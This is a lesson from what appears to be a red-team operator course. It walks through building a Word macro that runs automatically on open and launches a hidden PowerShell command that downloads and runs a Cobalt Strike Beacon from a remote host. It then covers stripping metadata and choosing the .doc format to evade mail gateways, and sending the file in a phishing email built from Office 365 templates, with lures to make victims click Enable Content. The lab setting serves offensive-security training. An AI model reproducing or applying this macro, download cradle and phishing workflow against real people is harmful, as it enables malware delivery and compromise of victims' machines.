# Visual Basic for Applications (VBA) Macros VBA is an implementation of Visual Basic that is very widely used with Microsoft Office applications - often used to enhance functionality in Word and Excel for data processing. The prevalence of macros in the commercial world is a double-edged sword when it comes to leveraging macros for malicious purposes. On one hand, the presence of a document with embedded macros is not necessarily suspicious; but because they *are* used maliciously by threat actors, they are also given more scrutiny both from technical products (e.g. web/email gateways) and in security awareness training. Launch Word on the Attacker Desktop. You can create a macro in a Word document by going to *View > Macros > Create*. Change the "Macros in" field from "All active templates and documents" to "Document 1". Give the macro a name and click *Create*. To force the macro to trigger automatically when the document is opened, use the name *AutoOpen*. ``` Sub AutoOpen() Dim Shell As Object Set Shell = CreateObject("wscript.shell") Shell.Run "notepad" End Sub ``` \\ "wscript" is the Windows Script Host, which is designed for automation. The "shell" method provides the ability to execute OS commands. To test the above code, use the play/pause/stop buttons. \\ ![](https://files.cdn.thinkific.com/file_uploads/584845/images/0b4/ff5/673/wscript.png) \\ Next, we need to replace notepad with a Beacon payload. The easiest to leverage is the PowerShell payload. In Cobalt Strike, go to *Attacks > Scripted Web Delivery (S)* and generate a 64-bit PowerShell payload for your HTTP listener. The URI path can be anything, but I will keep it as */a*. \\ ![](https://files.cdn.thinkific.com/file_uploads/584845/images/94e/ba0/32d/swd.png)\\ \\ This will generate a PowerShell payload and host it on the team server so that it can be downloaded over HTTP and executed in-memory. After clicking *Launch*, Cobalt Strike will generate the PowerShell one-liner that will do just that. \\ ![](https://files.cdn.thinkific.com/file_uploads/584845/images/5c5/5b6/77d/oneliner.png) \\ Copy/paste this line into the VBA and make sure to add another set of double quotation marks around the IEX command. It should look like this: ``` Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))""" ``` \\ To prepare the document for delivery, go to *File > Info > Inspect Document > Inspect Document*, which will bring up the Document Inspector. Click *Inspect* and then *Remove All* next to *Document Properties and Personal Information*. This is to prevent the username on your system being embedded in the document. Next, go to *File > Save As* and save it to *C:\Payloads*. Give it any filename, but in the *Save as type* dropdown, change the format from *.docx* to *Word 97-2003 (.doc)*. We do this because you can't save macros inside a `.docx` and there's a stigma around the macro-enabled `.docm` extension (e.g. the thumbnail icon has a huge `!` and some web/email gateway block them entirely). I find that this legacy `.doc` extension is the best compromise. We then want to upload this file to the team server as well. Go to *Site Management > Host File* and select your document. \\ ![](https://files.cdn.thinkific.com/file_uploads/584845/images/087/4fa/7c4/host-file.png) \\ *** \\ Even though the WYSIWYG text editor in OWA supports HTML, it's not very good for composing rich HTML-based emails. About the best it has are basic formatting options, but there is a bit of a hacky workaround and that is to use a pre-made HTML template. For example, [here](https://github.com/ZeroPointSecurity/PhishingTemplates/tree/master/Office365) are some HTML templates based around Office 365 (a copy can also be found in `C:\Tools\PhishingTemplates`). Open one of them, e.g. `Word.html` in Edge or another browser. Amazingly, what you can do is `Ctrl + A` and `Ctrl + C` to copy the content; and then `Ctrl + V` to paste it directly into the OWA text editor. All the text and image formatting should be preserved. You can change the text placeholders and URL to the payload on lines [160](https://github.com/ZeroPointSecurity/PhishingTemplates/blob/master/Office365/Word.html#L160), [183](https://github.com/ZeroPointSecurity/PhishingTemplates/blob/master/Office365/Word.html#L183), [192](https://github.com/ZeroPointSecurity/PhishingTemplates/blob/master/Office365/Word.html#L192), [197](https://github.com/ZeroPointSecurity/PhishingTemplates/blob/master/Office365/Word.html#L197), and [207](https://github.com/ZeroPointSecurity/PhishingTemplates/blob/master/Office365/Word.html#L207). My payload URL will be **. In the real world, you could use a service such as OneDrive as this would provide you a more legitimate domain name to use. \\ \\ ![](https://files.cdn.thinkific.com/file_uploads/584845/images/c94/98a/87d/doc-phish.png) \\ *** \\ Log into Workstation 2 as Bob, launch Outlook, and the email will arrive. \\ ![](https://files.cdn.thinkific.com/file_uploads/584845/images/fd4/90c/b29/inbox.png) \\ Clicking the link will open Edge and automatically download the document. Because the file is being downloaded via a browser, it will have the MOTW. So, when opened, it will first be in Protected View. \\ ![](https://files.cdn.thinkific.com/file_uploads/584845/images/00b/98d/4ad/protected-view.png) \\ The user must first click *Enabled Editing* and then on *Enable Content* to execute the macro. If you attach the document directly to the email, it will not have MOTW and therefore not open in Protected View. \\ ![](https://files.cdn.thinkific.com/file_uploads/584845/images/f56/95e/c92/enabled-content.png) \\ Many real-life samples you try to entice the user to click this button - usually saying something along the lines of "Security Product XYZ has scanned the content and deemed it to be safe. To reveal the content, click Enable Content". Once clicked, a PowerShell window will open briefly and then vanish. A new Beacon will appear in Cobalt Strike. \\ ![](https://files.cdn.thinkific.com/file_uploads/584845/images/e2f/dc0/f3a/first-beacon.png)